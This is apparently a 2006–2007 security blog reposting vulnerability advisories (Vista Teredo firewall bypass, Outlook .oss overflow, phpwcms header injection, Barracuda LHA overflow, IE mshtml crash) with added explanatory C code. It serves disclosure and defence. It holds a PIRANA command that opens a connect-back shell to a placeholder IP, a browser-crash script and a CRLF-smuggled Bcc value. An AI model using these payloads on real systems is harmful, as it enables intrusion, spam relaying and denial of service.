Wednesday, July 11, 2007

Vista Windows Firewall Incorrectly Applies Filtering to Teredo Interface


Author: Jim Hoagland / Ollie Whitehouse
Release Date: 10-07-2007
Application: Windows Firewall (Vista version)
Platform: Windows Vista (RTM and RC2 builds known affected; XP, 2003 would not be affected)
Severity: Unintended remote exposure to services
Vendor status: Resolved in MS07-038
CVE Number: CVE-2007-3038
Reference: http://www.securityfocus.com/bid/24779

Overview:

Windows Firewall for Windows Vista is the Microsoft-provided
firewall solution. It is installed and enabled out of the box,
with most ports filtered.

Due to an implementation issue, the Windows Firewall does not
apply firewall rules correctly on the Teredo Interface. This
allows a level of remote access to TCP and UDP ports and services
that exceeds what Microsoft expected and what an administrator
would expect.

Details:

Teredo is an IPv4-to-IPv6 transition mechanism for IPv6-capable
hosts that sit behind an IPv4 NAT. It is installed and enabled
out of the box on Windows Vista. It provides automatic end-to-end
tunnelling through the NAT by encapsulating IPv6 packets in IPv4
UDP datagrams. Once a Teredo interface has been set up (in Teredo
terminology: qualified), anyone on the Internet who knows its
Teredo address can send it packets and possibly establish
sessions. This capability persists until the Teredo interface
becomes de-qualified for some reason; while Teredo in general
works to keep an interface qualified, under some circumstances
Vista will shut the interface down after 60 minutes of
inactivity.

By design, Windows Firewall is supposed to block all access to
ports on the Teredo interface, except where access through Teredo
is specifically requested (by setting the "Edge Traversal" flag
on the firewall rule). However, due to a logic bug, it does not
apply this restriction. Instead, any port that is accessible on
the local network is also accessible from any host on the
Internet over the Teredo interface, even if the firewall rule
specifies "remote address = local subnet".

The level of exposure depends on current firewall rule settings.
An out-of-the-box Vista installation with a network profile set
to "private" will expose the following port across the Teredo
interface:

* TCP port 5357 (Web Services for Devices)

An exposed service may reveal sensitive or useful information to
an attacker. In combination with a vulnerability in the service
it may also provide an avenue of attack. In addition, a service
that was designed to only be accessible in trusted circumstances
may simply not present an adequate security posture for general
Internet access.

It is not considered difficult for a remote user to cause the
Teredo interface to become qualified. Teredo can become qualified
simply because Vista or some application wants to use IPv6 for
whatever reason. The attacker then only has to guess the Teredo
address, or learn it by some other means, to be able to reach any
open ports.

Teredo will also become qualified if the address of a peer is a
Teredo address (perhaps even if the peer itself has native IPv6
Internet access). Thus an attacker can send a URL of the form
"http://[2001:0:...]/..." by e-mail, IM, HTTP, etc., and if the
URL is followed, the attacker will both learn the victim's Teredo
address (the victim connects from it) and will have caused the
victim to become qualified. An HTTP redirect to such a URL would
also work and may be stealthier. Reportedly, Vista will not
return AAAA records corresponding to Teredo addresses, so the
attacker's Teredo address would have to be given as a literal
address rather than by hostname.
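
As an added illustration (written for this page; not part of the
Symantec advisory and not Microsoft code), the following C program
decodes a Teredo address into the fields RFC 4380 defines: the
Teredo server's IPv4 address, the flags word, and the client's
NAT-mapped external IPv4 address and UDP port, which are stored
XORed with all-ones bits. It makes two of the points above
concrete: an attacker who obtains a victim's Teredo address also
learns the victim's public NAT mapping, and a defender can
recognise Teredo addresses by their 2001:0::/32 prefix in logs. The
sample address and its decoding are the worked example given in
RFC 4380; the function names are this example's own.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of a Teredo address (RFC 4380):
 *   2001:0000 : SSSS:SSSS : FFFF : PPPP : AAAA:AAAA
 *   SSSS:SSSS = IPv4 address of the Teredo server
 *   FFFF      = flags; 0x8000 is the cone-NAT bit in RFC 4380
 *   PPPP      = client's NAT-mapped UDP port, stored XOR 0xFFFF
 *   AAAA:AAAA = client's NAT-mapped IPv4, stored XOR 0xFFFFFFFF */
struct teredo_addr {
    uint32_t server_v4;    /* host byte order */
    uint16_t flags;
    uint16_t mapped_port;  /* de-obfuscated */
    uint32_t mapped_v4;    /* de-obfuscated, host byte order */
};

static uint32_t be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | p[3];
}

static uint16_t be16(const unsigned char *p) {
    return (uint16_t)(((unsigned)p[0] << 8) | p[1]);
}

/* 1 if text parses as IPv6 and lies in the Teredo prefix 2001:0::/32, else 0. */
int is_teredo(const char *text) {
    unsigned char a[16];
    if (inet_pton(AF_INET6, text, a) != 1) return 0;
    return a[0] == 0x20 && a[1] == 0x01 && a[2] == 0x00 && a[3] == 0x00;
}

/* Decodes text into out; returns 0 on success, -1 if not a Teredo address. */
int teredo_parse(const char *text, struct teredo_addr *out) {
    unsigned char a[16];
    if (!is_teredo(text)) return -1;
    inet_pton(AF_INET6, text, a);               /* validated by is_teredo */
    out->server_v4   = be32(a + 4);
    out->flags       = be16(a + 8);
    out->mapped_port = (uint16_t)(be16(a + 10) ^ 0xFFFFu);
    out->mapped_v4   = be32(a + 12) ^ 0xFFFFFFFFu;
    return 0;
}

/* Field accessors; each returns 0 for anything that is not a Teredo address. */
uint32_t teredo_server_v4(const char *t)   { struct teredo_addr x; return teredo_parse(t, &x) ? 0 : x.server_v4; }
uint32_t teredo_client_v4(const char *t)   { struct teredo_addr x; return teredo_parse(t, &x) ? 0 : x.mapped_v4; }
unsigned teredo_client_port(const char *t) { struct teredo_addr x; return teredo_parse(t, &x) ? 0 : x.mapped_port; }
int      teredo_cone_flag(const char *t)   { struct teredo_addr x; return teredo_parse(t, &x) ? 0 : (x.flags & 0x8000) != 0; }

/* Writes a host-order IPv4 as a dotted quad; buf must hold at least 16 bytes. */
static void fmt_v4(uint32_t v, char *buf) {
    snprintf(buf, 16, "%u.%u.%u.%u", (unsigned)(v >> 24), (unsigned)(v >> 16) & 0xFF,
             (unsigned)(v >> 8) & 0xFF, (unsigned)v & 0xFF);
}

int main(void) {
    /* Worked example from RFC 4380: server 65.54.227.120, cone flag set,
     * client behind NAT 192.0.2.45 with external UDP port 40000. */
    const char *sample = "2001:0:4136:e378:8000:63bf:3fff:fdd2";
    struct teredo_addr t;
    char srv[16], cli[16];
    if (teredo_parse(sample, &t) != 0) { puts("not a Teredo address"); return 1; }
    fmt_v4(t.server_v4, srv);
    fmt_v4(t.mapped_v4, cli);
    printf("server %s  flags 0x%04x (%s)  client %s udp/%u\n", srv, t.flags,
           (t.flags & 0x8000) ? "cone" : "restricted", cli, t.mapped_port);
    return 0;
}
```

Teredo clients reach their server over IPv4 UDP port 3544, so
blocking outbound UDP 3544 at the network edge is the usual way to
enforce the recommendation below when Teredo is not wanted; on the
host side, the address itself carries no authentication, which is
why a reachable Teredo address is equivalent to a reachable port.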

Vendor Response:

This has been patched in MS07-038.

Recommendation:

Apply the patch contained in MS07-038.

In addition, you should consider whether Teredo poses an
acceptable level of exposure for your network. If it provides too
much exposure (e.g., by bypassing network-based security
controls), you should disable Teredo on hosts and block it on
your network.


Friday, June 29, 2007

Intel Core 2 Security concerns

Theo de Raadt posts some concerns about Core 2 processors. Interesting quotes include:

"Various developers are busy implimenting (sic) workarounds for serious bugs
in Intel's Core 2 cpu.

These processors are buggy as hell, and some of these bugs don't just
cause development/debugging problems, but will *ASSUREDLY* be
exploitable from userland code."


and:

"Note that some errata like AI65, AI79, AI43, AI39, AI90, AI99 scare
the hell out of us. Some of these are things that cannot be fixed in
running code, and some are things that every operating system will do
until about mid-2008.."


and:

"At this time, I cannot recommend purchase of any machines based on the
Intel Core 2 until these issues are dealt with (which I suspect will
take more than a year). Intel must become more transparent.

(While here, I would like to say that AMD is becoming less helpful day
by day towards open source operating systems too, perhaps because
their serious errata lists are growing rapidly too)."


A good, easy to understand summary for normal people is here: http://www.geek.com/images/geeknews/2006Jan/core_duo_errata__2006_01_21__full.gif

Only one bug is listed due to be fixed by Intel. All others are to be fixed by BIOS or OS producers.


Tuesday, March 6, 2007

Microsoft Outlook Advanced Find - Remote Code Execution

Security Advisory : CT09-01-2007

Microsoft Outlook Advanced Find - Remote Code Execution
Severity: Critical
Impact: Remote System Access
Solution Status: Vendor Patch
CVE Reference: CVE-2007-0034
Advisory Date: 11th January 2007


Affected Software: Microsoft Outlook 2000
Microsoft Outlook 2002
Microsoft Outlook 2003




1. OVERVIEW

Microsoft Outlook is a popular personal communication manager that
provides end users with a unified place to manage e-mail, calendar
and contact information.

As part of its standard offering, Outlook also includes an Advanced
Search facility (Finder.exe) enabling end-users to query any aspect
of their repository information.

Unfortunately, it transpires that Outlook/Finder is susceptible to
a remote buffer overflow vulnerability when processing the contents
of a specially crafted Office Saved Search (.oss) file.


2. TECHNICAL NARRATIVE

The issue in question stems from a simple oversight in the design of
an intrinsic string manipulation function, which attempts to copy
1024 bytes of user-supplied Unicode content into a pre-allocated
buffer of only 512 bytes (even though length checks are performed,
they do not prevent the copy).

As the destination buffer is unable to accommodate the additional data,
the net result is that of a classic stack overflow condition, in which
Instruction Pointer (EIP) control is gained via one of several available
return addresses.
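
The advisory does not say how a length check can be present and
yet 1024 bytes reach a 512-byte buffer. The usual way this happens,
and the assumption behind the added example below (illustrative C
written for this page, not Finder.exe code or the advisory
author's), is a unit mismatch: the bound is checked in UTF-16
characters while the buffer is sized in bytes, so 512 characters
pass the check and 1024 bytes are copied. The example reports how
far such a copy would run past the buffer without performing it,
and shows the hardened form that checks in bytes and reserves the
terminator. The function names, the 512-character limit and the
input strings are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF_BYTES 512   /* destination buffer size given in the advisory */
#define MAX_NAME_CHARS 512   /* ASSUMED: the limit the flawed check enforces, in UTF-16 characters */

/* Models the assumed flawed logic without performing the copy: the length is
 * checked in characters, but each UTF-16 character occupies 2 bytes, so 512
 * characters pass the check and 1024 bytes would be written into 512.
 * Returns how many bytes the copy would land past the end of the buffer
 * (0 if the input is rejected by the check or actually fits). */
size_t vuln_overrun_bytes(size_t name_chars) {
    if (name_chars > MAX_NAME_CHARS)                 /* the check, in the wrong unit */
        return 0;
    size_t bytes = name_chars * sizeof(uint16_t);    /* what the copy really moves */
    return bytes > NAME_BUF_BYTES ? bytes - NAME_BUF_BYTES : 0;
}

/* Hardened copy: the bound is computed in the unit the buffer is sized in
 * (bytes), room is reserved for the terminator, and oversize input is
 * rejected instead of silently truncated. Returns characters copied or -1. */
long copy_utf16_checked(uint16_t *dst, size_t dst_bytes,
                        const uint16_t *src, size_t src_chars) {
    if (dst_bytes < sizeof(uint16_t)) return -1;
    size_t max_chars = dst_bytes / sizeof(uint16_t) - 1;
    if (src_chars > max_chars) return -1;
    memcpy(dst, src, src_chars * sizeof(uint16_t));
    dst[src_chars] = 0;
    return (long)src_chars;
}

/* The hardened bound as a predicate, for the 512-byte buffer. */
int safe_check_accepts(size_t name_chars) {
    return name_chars <= NAME_BUF_BYTES / sizeof(uint16_t) - 1;
}

/* Runs the hardened copy of name_chars constructed characters into a
 * 512-byte buffer and returns its result (-1 when rejected). */
long demo_copy(size_t name_chars) {
    uint16_t dst[NAME_BUF_BYTES / sizeof(uint16_t)];
    uint16_t src[1024];
    if (name_chars > sizeof src / sizeof src[0]) return -1;
    for (size_t i = 0; i < name_chars; i++)
        src[i] = (uint16_t)('A' + (i % 26));         /* constructed input */
    return copy_utf16_checked(dst, sizeof dst, src, name_chars);
}

int main(void) {
    size_t lengths[] = { 255, 256, 512, 513 };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        size_t n = lengths[i];
        printf("%4zu chars: flawed check %s, overrun %4zu bytes; hardened copy -> %ld\n",
               n, n <= MAX_NAME_CHARS ? "accepts" : "rejects",
               vuln_overrun_bytes(n), demo_copy(n));
    }
    return 0;
}
```

The 512-character input is the interesting case: the flawed check
accepts it and the copy writes 512 bytes beyond the buffer, which
is the stack overflow the narrative describes; the hardened copy
rejects anything above 255 characters.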


3. EXPLOITATION

As with most file parsing vulnerabilities, the aforementioned issue
will require a certain degree of social engineering to achieve successful
exploitation.

However, Office Saved Search (.oss) files share very similar display
characteristics with harmless-looking e-mail icons. As such, end
users could be fooled into thinking the attachment is a
non-threatening mail forward.


4. VENDOR RESPONSE

The vendor security bulletin and corresponding patches are available at the
following location:

http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx


5. DISCLOSURE ANALYSIS

12/05/2006 - Preliminary Vendor notification.
24/05/2006 - Vulnerability confirmed by Vendor
16/10/2006 - Public Disclosure Deferred by Vendor
09/01/2007 - Public release.

Total Time to Fix: 7 months 29 Days (243 days in total)


6. CREDIT

The vulnerability was discovered by Stuart Pearson


Computer Terrorism (UK) :: Incident Response Centre.


Thursday, March 1, 2007

F-22 Superfighter software glitch fixed

Previous story: http://www.xnet.com.pk/news/2007/02/f-22-computer-glitch.html

Jets can now cross Pacific, Far East safe for democracy again
By Lewis Page
Published Wednesday 28th February 2007 10:59 GMT


Significant new capabilities have been added to the US Air Force's latest superfighter, the F-22 "Raptor". The USAF's Raptors cost more than $300m each, and are generally thought to be the most advanced combat jets in service worldwide. However, until recently they were unable to cross the international date line owing to a software bug in their navigation systems.

A group of F-22s heading across the Pacific for exercises in Japan earlier this month suffered simultaneous total nav-console crashes as their longitude shifted from 180 degrees West to 180 East.

Luckily, the superjets were accompanied by tanker planes, whose navigation kit was somewhat less bleeding-edge and remained functional. The tanker drivers were able to guide the lost top-guns back to Hawaii and the exercises were postponed.

"Every time we fly this jet we learn something new," Raptor squadron commanding officer Lt-Col Wade Tolliver said.

But enemies of democracy who may have been planning an opportunistic attack on Hawaii followed by a retreat to safety across the date line shouldn't get their hopes up. The software bug has been rectified, and the Raptors have now successfully travelled to Kadena Air Base in Japan, where air-combat exercises are now well underway.

"This is history in the making," said Brigadier Punch Moulton, commanding the Kadena-based 18th Wing.

The deployment is expected to last more than three months.


Monday, February 26, 2007

phpwcms act_formmailer.php and mail_file_form.php header injection

phpwcms-referer-security-bypass (26130)

Description:

phpwcms is a Content Management System (CMS) written in PHP. phpwcms versions 1.2.5-DEV and prior and versions 1.1-RC4 and prior are vulnerable to header injection, caused by improper validation of the HTTP REFERER header by the act_formmailer.php and mail_file_form.php scripts. A remote attacker could exploit this vulnerability to use an affected system to send arbitrary email and spam messages.
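
As an added example (written for this page in C; it is not phpwcms
code, which is PHP), the following shows the mechanism behind a
Referer header injection of this kind: a request header value is
placed verbatim into an outgoing mail header, so a value containing
CR LF ends that header line and begins another, here a Bcc that
turns the form mailer into a spam relay. The header name X-Referer,
the sender address and the spoofed Referer value are constructed
for the example; the fix shown is to reject any header value
containing CR or LF rather than attempt to clean it.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (assumed, modelled on the advisory): the raw Referer
 * value is dropped into a mail header line. A Referer containing CR LF
 * therefore starts a new header line of the attacker's choosing. */
int build_headers_vuln(char *out, size_t out_len, const char *from, const char *referer) {
    int n = snprintf(out, out_len, "From: %s\r\nX-Referer: %s\r\n", from, referer);
    return (n < 0 || (size_t)n >= out_len) ? -1 : n;
}

/* A value may occupy a single header line only if it carries no CR or LF. */
int header_value_is_safe(const char *v) {
    return strpbrk(v, "\r\n") == NULL;
}

/* Hardened: refuse the request instead of trying to "clean" the value. */
int build_headers_safe(char *out, size_t out_len, const char *from, const char *referer) {
    if (!header_value_is_safe(from) || !header_value_is_safe(referer)) return -1;
    return build_headers_vuln(out, out_len, from, referer);
}

/* Counts header lines in a block, i.e. the number of CR LF terminators. */
int count_header_lines(const char *hdrs) {
    int n = 0;
    for (const char *p = hdrs; (p = strstr(p, "\r\n")) != NULL; p += 2) n++;
    return n;
}

/* Constructed test values: a spoofed Referer smuggling a Bcc header. */
#define SPOOFED_REFERER "http://www.example.test/\r\nBcc: spam-target@example.test"
#define BENIGN_REFERER  "http://www.example.test/contact.php"

/* Header lines produced by each builder for a given Referer (-1 = rejected). */
int vuln_lines_for(const char *referer) {
    char buf[512];
    return build_headers_vuln(buf, sizeof buf, "form@example.test", referer) < 0
           ? -1 : count_header_lines(buf);
}
int safe_lines_for(const char *referer) {
    char buf[512];
    return build_headers_safe(buf, sizeof buf, "form@example.test", referer) < 0
           ? -1 : count_header_lines(buf);
}

int main(void) {
    printf("vulnerable, spoofed Referer: %d header lines (Bcc injected)\n",
           vuln_lines_for(SPOOFED_REFERER));
    printf("hardened,   spoofed Referer: %d (request rejected)\n",
           safe_lines_for(SPOOFED_REFERER));
    printf("hardened,   benign Referer:  %d header lines\n",
           safe_lines_for(BENIGN_REFERER));
    return 0;
}
```

The same check applies to every request-derived value that lands
in a mail header (Subject, From, Reply-To), not just the Referer:
the Referer is simply the one field the page's scripts trusted.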

Platforms Affected:
Data General: DG/UX Any version
Hewlett-Packard Company: HP-UX Any version
Hewlett-Packard Company: Tru64 UNIX Any version
IBM: AIX Any version
Linux: Linux Any version
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0
phpwcms: phpwcms 1.1-RC4 and prior
phpwcms: phpwcms 1.2.5-DEV and prior
Santa Cruz Operation, Inc.: SCO Unix Any version
SGI: IRIX Any version
Sun Microsystems, Inc.: Solaris Any version
Wind River Systems, Inc.: BSD Any version

Remedy:

Apply the patch for this vulnerability, available from the phpwcms Web site. See References.

Consequences:

Bypass Security

References:
FrSIRT/ADV-2006-1556, phpwcms Remote Code Execution and Mail Form Security Bypass Vulnerabilities at http://www.frsirt.com/english/advisories/2006/1556.
phpwcms Forum, Fri Apr 21, 2006 16:11, Security Alert 1.2.6 CVS at http://www.phpwcms.de/forum/viewtopic.php?t=10958.
phpwcms Web site, phpwcms at http://www.phpwcms.de.

Standards associated with this entry:
CVE-2006-7020: CRLF injection vulnerability in (1) include/inc_act/act_formmailer.php and possibly (2) sample_ext_php/mail_file_form.php in phpwcms 1.2.5-DEV and earlier, and 1.1 before RC4, allows remote attackers to modify HTTP headers and send spam e-mail via a spoofed HTTP Referer (HTTP_REFERER).

Reported:

Apr 21, 2006

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Copyright (c) 1994-2007 Internet Security Systems, Inc. All rights reserved worldwide.


F-22 Computer Glitch

CNN television this morning reported that every fighter completely lost all navigation and communications when they crossed the international date line. They reportedly had to turn around and follow their tankers by visual contact back to Hawaii. According to the CNN story, if they had not been with their tankers, or the weather had been bad, this would have been serious. CNN has not put up anything on their website yet.


Tuesday, May 16, 2006

Microsoft Exchange fails to properly handle vCal and iCal properties

Microsoft Windows and Exchange Server Vulnerabilities
Original release date: May 9, 2006
Last revised: --
Source: US-CERT

Systems Affected
Microsoft Windows
Microsoft Exchange Server

For more complete information, refer to the Microsoft Security Bulletin Summary for May 2006.

Overview

Microsoft has released updates that address critical vulnerabilities in Microsoft Windows and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on a vulnerable system.

I. Description

Microsoft Security Bulletin Summary for May 2006 addresses vulnerabilities in Microsoft Windows and Exchange Server. Further information is available in the following US-CERT Vulnerability Notes:

VU#303452 - Microsoft Exchange fails to properly handle vCal and iCal properties

Microsoft Exchange Server does not properly handle the vCal and iCal properties of email messages. Exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on an Exchange Server.
(CVE-2006-0027)

VU#945060 - Adobe Flash products contain multiple vulnerabilities

Several vulnerabilities in Adobe Macromedia Flash products may allow a remote attacker to execute code on a vulnerable system.
(CVE-2006-0024)

VU#146284 - Macromedia Flash Player fails to properly validate the frame type identifier read from a "SWF" file

A buffer overflow vulnerability in some versions of the Macromedia Flash Player may allow a remote attacker to execute code on a vulnerable system.
(CVE-2005-2628)

II. Impact

A remote, unauthenticated attacker could execute arbitrary code on a vulnerable system. An attacker may also be able to cause a denial of service.

III. Solution
Apply Updates

Microsoft has provided updates for these vulnerabilities in the Security Bulletins. Microsoft Windows updates are available on the Microsoft Update site.

Workarounds

Please see the US-CERT Vulnerability Notes for workarounds.
Appendix A. References
Microsoft Security Bulletin Summary for May 2006
Technical Cyber Security Alert TA06-075A
US-CERT Vulnerability Note VU#303452
US-CERT Vulnerability Note VU#945060
US-CERT Vulnerability Note VU#146284
CVE-2006-0027
CVE-2006-0024
CVE-2005-2628
Microsoft Update


Thursday, April 6, 2006

[Full-disclosure] Barracuda LHA archiver security bug leads to remote compromise

Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006

Topic: Barracuda LHA archiver security bug leads to remote compromise

Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234


I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service


II. DESCRIPTION

When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.

You do NOT need remote administration access (on port 8000) for
successful exploitation.

For further information about the details of the bugs, you can
consult OSVDB #5753 and #5754.


III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall


IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1


V. SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.

They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.

It is recommended to update to firmware #3.3.03.022 .


VI. CREDITS

Ulf Harnhammar who found the original LHA flaw.

Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.


VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234


VIII. HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public


Tuesday, March 28, 2006

Microsoft IE mshtml.dll Multiple Script Action Handler Overflow

OSVDB ID: 23964
Disclosure Date: Mar 16, 2006

Description:

A remote overflow exists in Microsoft Internet Explorer. The product fails to properly check bounds when handling HTML tags with multiple event handlers, resulting in a buffer overflow. With a specially crafted HTML document, an attacker can cause affected web browsers to crash or execute arbitrary code, resulting in a loss of integrity and/or availability.

Vulnerability Classification:
Remote/Network Access Required
Denial Of Service Attack
Input Manipulation
Loss Of Integrity
Loss Of Availability
Exploit Available
Verified

Products:
Microsoft Corporation Internet Explorer 6.0 SP2
Microsoft Corporation Internet Explorer 7.0 beta 2
Microsoft Corporation Internet Explorer 7.0 beta 1

Solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes:

The following HTML content demonstrates this issue by crashing the browser:

<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>

External References:
Snort Signature ID: http://www.snort.org/pub-bin/sigs.cgi?sid=100000238
CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-1245
National Vulnerability Database: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-1245
Bugtraq ID: http://www.securityfocus.com/bid/17131
Microsoft Security Bulletin: http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx
Generic Exploit URL: http://lcamtuf.coredump.cx/iedie.html
ISS X-Force ID: http://xforce.iss.net/xforce/xfdb/25292
Secunia Advisory ID: http://secunia.com/advisories/18957
Secunia Advisory ID: http://secunia.com/advisories/19269
Microsoft Knowledge Base Article: http://support.microsoft.com/default.aspx?scid=kb;EN-US;912812
Other Solution URL: http://snort.org/rules/advisories/ie-issue-js-v2.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0303.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0304.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0310.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0325.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0048.html
Security Tracker: http://securitytracker.com/id?1015794

Credit:
Michal Zalewski (lcamtuf@dione.ids.pl) - Personal page (http://lcamtuf.coredump.cx/)


Sunday, March 19, 2006

Microsoft Office and Excel Buffer Overflows Let Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1015766
SecurityTracker URL: http://securitytracker.com/id?1015766
CVE Reference: CVE-2005-4131 , CVE-2006-0009 , CVE-2006-0028 , CVE-2006-0029 , CVE-2006-0030 , CVE-2006-0031
Updated: Mar 14 2006
Original Entry Date: Mar 14 2006
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Description: Several vulnerabilities were reported in various components of Microsoft Office. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted document that, when loaded by the target user, will trigger a buffer overflow and execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

An Excel document with a specially crafted range can cause arbitrary code to be executed on the target system [CVE-2005-4131]. [Editor's note: This vulnerability was previously disclosed in Alert ID 1015333.]

A specially crafted routing slip within an Office document can cause arbitrary code to be executed on the target system [CVE-2006-0009].

An Excel document with a specially crafted parsing format file can cause arbitrary code to be executed on the target system [CVE-2006-0028].

An Excel document with a specially crafted description can cause arbitrary code to be executed on the target system [CVE-2006-0029].

An Excel document with a specially crafted graphic can cause arbitrary code to be executed on the target system [CVE-2006-0030].

An Excel document with a specially crafted record can cause arbitrary code to be executed on the target system [CVE-2006-0031].

Microsoft Office 2000 SP3, Microsoft Office XP SP3, Microsoft Office 2003 SP1 or SP2, Microsoft Works Suite 2000, 2001, 2002, 2003, 2004, 2005, and 2006, Microsoft Office X for Mac, and Microsoft Office 2004 for Mac are affected.

Microsoft Office Excel 2000 Viewer, Microsoft Office Excel 2002 Viewer, Microsoft Word 2003, Microsoft Outlook 2003, and Microsoft PowerPoint 2003 are not affected.

Microsoft credits Ollie Whitehouse of Symantec [CVE-2006-0009], FelicioX [CVE-2005-4131], Peter Winter-Smith of NGS Software [CVE-2005-4131], TippingPoint and the Zero Day Initiative [CVE-2006-0028], Dejun of the Fortinet Security Response Team [CVE-2006-0029], and Eyas of the XFOCUS Security Team [CVE-2006-0031] with reporting these vulnerabilities.
Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
Solution: The vendor has issued the following fixes:

Microsoft Word 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4

Microsoft Excel 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9433440-31EF-4C18-A0C7-B595EA23F6FC

Microsoft Outlook 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=2B231231-AC83-4688-9C8D-DCDCB544FB3C

Microsoft PowerPoint 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F24D4BD0-4771-4688-B52A-02D4EABB1574

Microsoft Office 2000 MultiLanguage Packs:
http://www.microsoft.com/downloads/details.aspx?FamilyId=0AAA1700-766F-4979-B51F-AAA0A24EF2E8

Microsoft Word 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Excel 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=643337C7-8A47-4FA3-AB58-7A916B33607D&displaylang=en

Microsoft Outlook 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9B0D4441-4F88-4B59-A4F3-6FB558EF8135

Microsoft PowerPoint 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C74CB45B-CF92-4EFC-8DBE-DBF4BDEBE215

Microsoft Office XP Multilingual User Interface Packs:
http://www.microsoft.com/downloads/details.aspx?FamilyId=589D9ABB-6308-4208-881C-CE58D6972E1F&displaylang=en

Microsoft Excel 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=AC22F83A-B409-4469-984E-6C19D8F5FE41&displaylang=en

Microsoft Excel 2003 Viewer:

http://www.microsoft.com/downloads/details.aspx?FamilyId=7DBADBD1-0542-475B-91B5-90DD2AF2C0FC&displaylang=en

Microsoft Works Suite 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4&displaylang=en

Microsoft Works Suite 2001:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4&displaylang=en

Microsoft Works Suite 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Works Suite 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Works Suite 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Works Suite 2005:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Works Suite 2006:
